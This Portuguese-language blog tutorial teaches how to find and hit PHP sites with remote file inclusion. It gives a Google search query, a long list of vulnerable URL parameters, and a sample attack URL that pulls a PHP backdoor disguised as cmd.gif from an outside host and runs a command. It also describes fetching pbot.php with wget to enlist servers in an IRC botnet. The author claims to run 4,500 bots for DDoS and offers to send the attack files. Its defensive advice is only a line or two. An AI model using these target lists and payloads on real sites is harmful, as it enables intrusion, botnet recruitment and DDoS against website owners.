Procurando hosts vulneráveis

A maioria dos crackers utilizam script kiddies (script prontos), aproveitam a ferramenta de pesquisa Google para buscar strings vulneráveis. Existem alguns scanners feitos em Delphi disponíveis na internet que consultam strings diretamente no resultado de pesquisa de sites como Google, Aonde, UOL etc. Após o resultado ser exibido no sistema, o cracker aplica o exploit na lista gerada, efetuando um ataque em massa.

Algumas técnicas são utilizadas diretamente pelo Google como por exemplo:

allinurl: admin?id=

Os hosts mais vulneráveis são sistemas de código fonte aberto, como Joomla, PHP-Nuke, Wordpress etc. Por isso é bacana sempre manter estes aplicativos atualizados, evitando um possível ataque.

Muitos perguntam porque na maioria dos ataques os principais aplicativos afetados são de open source. Logo digo, uma vez que temos acesso a todos os fontes do aplicativo, devido ao amplo conhecimento em programação acharemos falhas.

Strings conhecidas

Algumas strings bastante conhecidas pelos crackers, dificilmente acharemos algum site vulnerável com estas strings, mas vale a pena verificar:

./modules/mod_mainmenu.php?mosConfig_absolute_path=
./include/new-visitor.inc.php?lvc_include_dir=
./path_of_cpcommerce/_functions.php?prefix
./modules/My_eGallery/public/displayCategory.php?basepath=
./modules/4nAlbum/public/displayCategory.php?basepath=
./modules/coppermine/themes/default/theme.php?THEME_DIR=
./modules/agendax/addevent.inc.php?agendax_path=
./shoutbox/expanded.php?conf=
./modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
./pivot/modules/module_db.php?pivot_path=
./library/editor/editor.php?root=
./library/lib.php?root=
./e107/e107_handlers/secure_img_render.php?p=
./main.php?x=
./index.php/main.php?x=
./index.php?include=
./index.php?x=
./index.php?open=
./index.php?visualizar=
./template.php?pagina=
./index.php?pagina=
./index.php?inc=
./index.php?leng=
./index.php?page=
./index.php?rev=
./index.php?main=
./index.php?show=
./index.php?x=
./index.php?inc=
./index.php?menu=
./index.php?aktie=
./index.php?s=
./index.php?p=
./index.php?principal=
./index.php?url=
./index.php?file=
./index.php?do=
./index.php?side=
./index.php?f=
./index.php?display=
./index.php?webpage=
./index.php?content=
./index.php?source=
./index.php?texto=
./index.php?go=
./index.php?contents=
./index.php?meio=
./index.php?miolo=
./index.php?section=
./index.php?configFile=
./index.php?op=
./index.php?id=
./index.php?corpo=
./index.php?article=
./index.php?Itemid=
./index.php?product_id=
./index.php?lang=
./index.php?showtopic=
./index.php?option=
./index.php?link=
./index.php?module=
./index.php?submenu=
./index.php?cat=
./index.php?visualizar=
./index.php?open=
./index.php?include=
./main.php?page=
./main.php?file=
./main.php?ver=
./main.php?dir=
./main.php?side=
./main.php?doc=
./main.php?x=
./main.php?lk=
./main.php?pbody=
./main.php?menu=
./main.php?op=

Atacando alvo exemplo

Uma vez tendo uma string vulnerável ao nosso scanner, darei um exemplo conhecido de um cmd em formato gif:

http://www.exemplo.org/index.php?site=http://www.site_onde_a_cmd.gif_ta.com/cmd.gif?&cmd=id

Veja o link acima e analise que chamamos uma URL remota para execução do nosso gif, em que na verdade o conteúdo deste gif possui códigos em PHP para um backdoor embutido no gif, permitindo que o cracker tenha acesso do sistema pelo usuário do Apache.

Por isso é bom lembrar, não rodem o Apache como root, pois se algum dia sua aplicação for vulnerável o atacante ficará restrito no id do usuário, não prejudicando tanto seu servidor.

Para curiosos, posso passar todos os arquivos por e-mail ou MSN.

MSN: vinicius@srvr.com.br
E-mail: vinicius@idea-planejamento.com

Continuando:

Observe que no final da string temos o comando id. Interessante não é, após a execução desta URL o exploit irá rodar e na tela no browser teremos uma tela para gerenciamento do bash alvo e o resultado do comando id.

Alguns crackers executam outros backdoors através desta string, um exemplo é tornar o alvo zombie do atacante fazendo conexões reversas em servidores de IRC. Como exemplo utilizaremos o PBOT.php.

O atacante coloca na URL um wget baixando o pbot.php, sendo que neste pbot o servidor irá conectar-se remotamente em uma sala de IRC administrado pelo cracker, tornando-se um zombie na espera de um comando..

Uma vez o servidor estando conectado na servidor do IRC, o cracker pode administrar vários alvos ao mesmo tempo, podendo criar ataque em massa chamado botnet.

Conclusão

Eu mesmo utilizo parte desta técnica, pois as strings comentadas neste tutorial são antigas. Atualmente tenho 4.500 bots em meu domínio. Não utilizo esses bots para hacker páginas e danificar sistemas. Utilizo para testes de análise de segurança, ataque DDOS e quebra de criptografias.

O alvo atacado não identifica seu endereço IP, pois quem faz o ataque são os botnet e não você.

Brevemente estarei criando outro artigo explicando como se defender de ataques botnets.

Provo para vocês que muitos sites conhecidos estão vulneráveis a este tipo de ataque.

Caso queira testar seu site, mande um comentário com seu domínio ou me adicione no MSN vinicius@srvr.com.br.

Att
Vinicius
IDEA